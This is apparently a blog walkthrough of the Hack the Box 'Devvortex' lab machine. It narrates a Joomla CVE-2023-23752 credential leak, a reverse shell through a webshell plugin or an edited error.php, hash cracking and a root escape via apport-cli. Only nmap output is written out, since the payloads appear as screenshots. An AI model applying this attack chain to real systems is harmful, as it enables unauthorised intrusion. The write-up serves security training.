In this post, I would like to share a walkthrough of the Devvortex Machine from Hack the Box
This room will be considered an Easy machine on Hack the Box
What will you gain from the Devvortex machine?
For the user flag, you will need to expose the list of users along with the database connection password, leveraging this information to gain entry to the admin panel. Within the admin panel, I’ll demonstrate obtaining execution privileges through two methods: by altering a template and by creating a webshell plugin. Upon obtaining access, I’ll proceed to pivot to the next user by decrypting their hash from the database.
As for the root flag, you need to abuse a pager vulnerability in apport-cli that allows escaping to a root shell when run with sudo.
For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me
Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvvInformation Gathering on Devvortex Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
┌─[darknite@parrot]─[~/Documents/htb/Devvortex]
└──╼ $ nmap -sC -sV 10.10.11.242 -oA inital
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-26 08:43 EST
Nmap scan report for 10.10.11.242
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.76 seconds
┌─[darknite@parrot]─[~/Documents/htb/Devvortex]
└──╼ $
Let’s access the website interface
Sadly, we didn’t see anything useful to be abused by us.
Therefore, let’s try to enumerate the directory with gobuster but not much of the directory that we can investigate into
As a result, let’s try to retrieve any subdomain with gobuster and we only obtain one subdomain which is dev.devvortex.htb
The screenshot above shows the website interface for the subdomain that we found earlier.
Let’s see the response via burpsuite which there’s nothing that we can look into
After we analyze the website interface thoroughly, there’s nothing that we use in the next step. Therefore, let’s enumerate the directory by using the gobuster. From the output, we can access the administrator on the browser.
Let’s access the /administrator directory on the website which we are presented with login page. If you notice, the page shows the Joomla Interface.
There is nothing stored on the /modules/ directory
From my experience of playing with the Joomla application before, there should be a robots.txt file stored inside the website
The screenshot above shows the default information for JOOMLA on the website which led us to notify the version of JOOMLA use
CVE-2023-23752 Vulnerability
As a result, let’s do some research on it
There’s a GitHub page that can be found here which we can abuse later on
We can use the GitHub – Pushkarup/CVE-2023-23752: Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) for further step
Let’s install it manually on our machine
By using those scripts, we can obtain the username and password using this method
We should be accessing the dashboard using the credentials that we found earlier
We can enter the exploit shown above
Let’s start our listener
Let’s create an empty HTML file
We should zip those files into one file
On the System Dashboard, we need to find somewhere that we can upload the malicious file
As a result, we should be looking at the plugins that have been installed within the JOOMLA
We are required to upload the malicious file into the Joomla Application
At last, we have successfully uploaded the malicious file
After a while, we should be getting the reverse shell connection back to us.
Another method to get the www-data shell
As we abuse the WordPress theme, we might be able to abuse the theme on the JOOMLA application
However, we are presented with only one theme on the JOOMLA application
On the error.php file, we need to add the malicious PHP command which will lead us to obtain the reverse shell on our machine
We can trigger the malicious command by accessing the error.php page
At last, we can also obtain the shell this way
Enumerate the MySQL database on the machine
Let’s access the database
We should be presented the database as shown above
The screenshot above shows the tables that can be investigated further
It doesn’t look pretty organized
After a while of analysis, we managed to obtain the hashes that were stored inside the database
We should be copy-paste the hashes that we found earlier into a file
Let’s start our hashcat process
Finally, we have retrieved the password for logan
Boom! We have successfully accessed the machine as logan
Let’s get the access as login by using pwncat-cs or SSH service
e
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
As usual, we found the binary we can abuse in the next stage.
CVE-2023–26604 Vulnerability
The screenshot above shows the source code for the binary
Let’s execute the binary
The picture above shows the help manual for the binary
We also can find the version of the binary
Firstly, we can check the crash in which only two files are stored.
We need to check the process by using the sleep command
Therefore, let’s kill the process that we found earlier.
There is one new crash file after that progress
Let’s use the new crash file
Let’s try to execute the simple and basic command as shown above
As a result, we managed to execute the command injection by using the crash file
We can use the command injection to give the bash permission as SUID binary
We can read the user flag by typing the “cat root.txt” command
Extra Information on Devvortex machine
No responses yet